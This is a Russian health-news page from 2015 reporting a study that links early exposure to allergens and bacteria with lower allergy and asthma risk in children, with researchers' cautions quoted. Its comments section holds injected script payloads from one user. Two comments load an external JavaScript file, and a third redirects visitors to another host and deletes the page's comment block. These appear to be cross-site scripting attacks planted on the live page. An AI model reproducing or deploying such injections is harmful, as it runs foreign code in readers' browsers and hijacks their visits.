Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Слишком чисто тоже плохо!...  >>  Слишком чисто тоже плохо! Чистота вызывает аллергию!
 
Обратная связь
 

Слишком чисто тоже плохо! Чистота вызывает аллергию!

Размер шрифта
29 мая 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, чистота – это далеко не всегда хорошо. По мнению ученых, проживание в слишком чистой квартире может сделать ребенка восприимчивым к развитию аллергии и даже астмы.

Слишком чисто тоже плохо! Чистота вызывает аллергию!

Дети реже страдают от аллергии или обструкции (нарушения проходимости) бронхов, если в течение первого года жизни они проживают в помещении, где обитают определенные бактерии, а также присутствуют различные аллергены. «Чем больше в окружающей среде присутствует аллергенов, тем менее вероятно, что у вас разовьется аллергия», – рассказывает доктор Роберт Вуд, соавтор исследования и глава отделения аллергологии и иммунологии Центра Джона Хопкинса в Балтиморе. Результаты этого исследования были опубликованы в Journal of Allergy and Clinical Immunology.

Около 41% детей без аллергии выросли в домах, в которых в изобилии присутствовали различные бактерии и аллергены. И лишь у 8% детей, выросших в подобных условиях, были диагностированы аллергия и обструктивное заболевание бронхов.

Эти результаты подтверждают «гипотезу гигиены», которая говорит о том, что дети, которые живут в слишком чистых домах, более подвержены различным аллергиям, так как у их организма нет возможности выработать должную реакцию на аллергены. Более ранние исследования показали, что дети, которые росли на фермах, реже страдают от аллергии или астмы, вероятнее всего из-за того, что постоянно подвержены воздействию различных бактерий и аллергенов. «Окружающая среда влияет на иммунную систему, поэтому если ребенок растет в излишне чистой среде, его иммунная система не получает достаточной стимуляции», – объясняет Тодд Мар, врач аллерголог-иммунолог.

В новое исследование были включены 467 новорожденных детей из Балтимора, Бостона, Нью-Йорка и Сент-Луиса. Врачи следили за здоровьем детей, начиная с периода беременности и далее в течение всего их детства. Также ученые посетили их дома, чтобы определить наличие в них различных аллергенов и бактерий. Они выяснили, что те дети, которые в первый год своей жизни жили в домах, в которых присутствовали мыши, тараканы и кошки, имели очень низкую вероятность развития бронхообструктивных заболеваний в возрасте трех лет по сравнению с теми детьми, которые не контактировали с перечисленными аллергенами.

Бронхообструкция была выявлена у 51% детей, которые выросли в «чистых» домах и лишь у 17% детей, в квартирах которых были обнаружены все три аллергена. Также дети без аллергий и бронхообструкции обычно жили в домах, где встречалось множество видов бактерий. «Комбинация различных аллергенов и разных типов бактерий – вот наиболее выигрышное сочетание», – считает доктор Вуд.

Однако как Вуд, так и Мар предупреждают, что эти данные нуждаются в проверке, поэтому родители не должны опираться на них в процессе принятия решений. К примеру, не стоит заводить кошку или собаку только для того, чтобы предотвратить развитие аллергии у ребенка, но и избавляться от уже имеющегося животного тоже не стоит. «И уж тем более не стоит намеренно разводить в квартире тараканов», – добавляет Вуд.

Если исследования в этой области будут продолжены, то вполне возможно, что уже в ближайшем будущем будут разработаны методики лечения, которые помогут сформировать у детей устойчивость к развитию аллергий.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

30 мая 2015 в 01:03

Комментарий удален за нарушение Правил общения

2 - Гость

02 июня 2015 в 16:34

Комментарий удален за нарушение Правил общения

3 - zzzzzz

30 июня 2015 в 18:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 21:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:06

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Домашние собаки не дадут ребенку стать аллергиком   3D в помощь хозяйке   Если ребенок страдает аллергией   Как пережить жару дома  
21 июня 2013Хочешь, чтобы у твоего ребенка не было аллергии, – пососи его соску! 05 июня 2013Одна СМС может спасти жизнь вашего ребенка!
 
06 ноября 2012Подростки не могут побороть страх 22 октября 2012Детское ожирение – причина рака
 

Слайдшоу

1
Как дата рождения повлияет на вашу жизнь
Что надо иметь каждому аллергику
Как оградить спальню от аллергии

Тесты

1
Что вы знаете о грудном вскармливании?
Как контролировать бронхиальную астму у взрослых
Как контролировать бронхиальную астму у детей
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.